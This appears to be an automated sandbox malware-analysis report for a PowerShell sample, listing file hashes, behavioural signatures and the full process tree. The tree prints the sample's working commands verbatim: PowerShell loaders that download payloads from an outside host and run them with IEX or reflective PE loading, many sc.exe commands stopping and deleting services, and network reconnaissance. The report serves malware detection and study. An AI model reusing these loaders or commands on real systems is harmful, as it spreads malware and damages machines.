Analysis
-
max time kernel
150s -
max time network
141s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
07-05-2021 16:18
General
-
Target
a.ps1
-
Size
8KB
-
MD5
5999be483bae2a132bc4554620e37cfc
-
SHA1
bbd9c4dd37b2cd310618ab5f0e5fa56d66ee69aa
-
SHA256
608538fcefef29626896925675428811db363e0870f193d253bd7319d264ca7f
-
SHA512
50f507f08e64b171da7f725a6bed7ccc0def006e6da0f3ac97feeb7323ffd699b0228cc1fb7c7c897db90762686a559a5c803373d7eedb61f635c20d0ee253fa
Malware Config
Extracted
http://t.ntele.net
Signatures
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 6 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 7 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 42 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\a.ps11⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='842c31c85b972db52eba0e2470e87184';$ifp=$env:tmp+'\if.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/if.bin?^^^&RJMQBVDN^^^&00000000-0000-0000-0000-000000000000^^^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)|sO2Rkj.exe -2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='842c31c85b972db52eba0e2470e87184';$ifp=$env:tmp+'\if.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/if.bin?^&RJMQBVDN^&00000000-0000-0000-0000-000000000000^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\sO2Rkj.exesO2Rkj.exe -3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z140u5tq\z140u5tq.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77B1.tmp" "c:\Users\Admin\AppData\Local\Temp\z140u5tq\CSC45B728E41CE47BCAC535F8C9F819FF5.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\53jwwbcb\53jwwbcb.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7996.tmp" "c:\Users\Admin\AppData\Local\Temp\53jwwbcb\CSCECEC7031BE6B4179A3E8DABE741EB380.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ysh0epyv\ysh0epyv.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B66.tmp" "c:\Users\Admin\AppData\Local\Temp\ysh0epyv\CSCE4CE5227DA914B3F8022E82A1D1A5EC4.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2b2cqvmj\2b2cqvmj.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES807B.tmp" "c:\Users\Admin\AppData\Local\Temp\2b2cqvmj\CSCF50710E3253843DA8E318D3AAF1388AD.TMP"5⤵
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /user4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iatpx2mz\iatpx2mz.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14DC.tmp" "c:\Users\Admin\AppData\Local\Temp\iatpx2mz\CSC54DA47EFA2E946A3AAB61605ECD9114.TMP"5⤵
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all4⤵
- Gathers network information
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns4⤵
- Gathers network information
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano4⤵
- Gathers network information
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/m6.bin?^^^&RJMQBVDN^^^&00000000-0000-0000-0000-000000000000^^^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};iex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|sO2Rkj.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/m6.bin?^&RJMQBVDN^&00000000-0000-0000-0000-000000000000^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};iex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\sO2Rkj.exesO2Rkj.exe -3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='5a275a03a92b0631134fdaa8ebba683c';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/kr.bin?^^^&RJMQBVDN^^^&00000000-0000-0000-0000-000000000000^^^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)|sO2Rkj.exe -2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='5a275a03a92b0631134fdaa8ebba683c';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/kr.bin?^&RJMQBVDN^&00000000-0000-0000-0000-000000000000^&46:58:48:78:C9:AA');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\sO2Rkj.exesO2Rkj.exe -3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1eqh3har\1eqh3har.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES450D.tmp" "c:\Users\Admin\AppData\Local\Temp\1eqh3har\CSC89149531FE8748F6A165D14F4345A02D.TMP"5⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" pg.b69kq.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" p.b69kq.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" pg.k3qh4.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" p.k3qh4.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" lplp.ackng.com4⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -anop TCP4⤵
- Gathers network information
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" pg.b69kq.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" p.b69kq.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" pg.k3qh4.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" p.k3qh4.com4⤵
-
C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" lplp.ackng.com4⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -anop TCP4⤵
- Gathers network information
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop xWinWpdSrv4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete xWinWpdSrv4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SVSHost4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SVSHost4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config lsass Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop lsass4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete lsass4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Microsoft4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Microsoft4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config system Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop system4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete system4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Oracleupdate4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Oracleupdate4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config CLR Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop CLR4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete CLR4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop sysmgt4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete sysmgt4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config \gm Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop \gm4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete \gm4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WmdnPnSN4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WmdnPnSN4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Sougoudl4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Sougoudl4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config National Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop National4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete National4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaaal4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaaal4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Natimmonal4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Natimmonal4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaloll4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaloll4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalmll4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalmll4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalaie4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalaie4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalwpi4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalwpi4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp324⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp324⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp644⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp644⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Samserver4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Samserver4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop RpcEptManger4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete RpcEptManger4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SxS Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SxS4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SxS4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.14⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.14⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.04⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.04⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Windows_Update4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Windows_Update4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Windows Managers"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Windows Managers"4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SvcNlauser4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SvcNlauser4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinVaultSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinVaultSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfy4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfy4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfya4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfya4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfyxxx4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfyxxx4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop 360rTys4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete 360rTys4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop IPSECS4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete IPSECS4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete MpeSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop MpeSvc4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SRDSL4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SRDSL4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WifiService4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WifiService4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ALGM4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ALGM4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApSrvs4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApSrvs4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApServs4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApServs4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop taskmgr14⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete taskmgr14⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WebServers4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WebServers4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ExpressVNService4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ExpressVNService4⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled4⤵
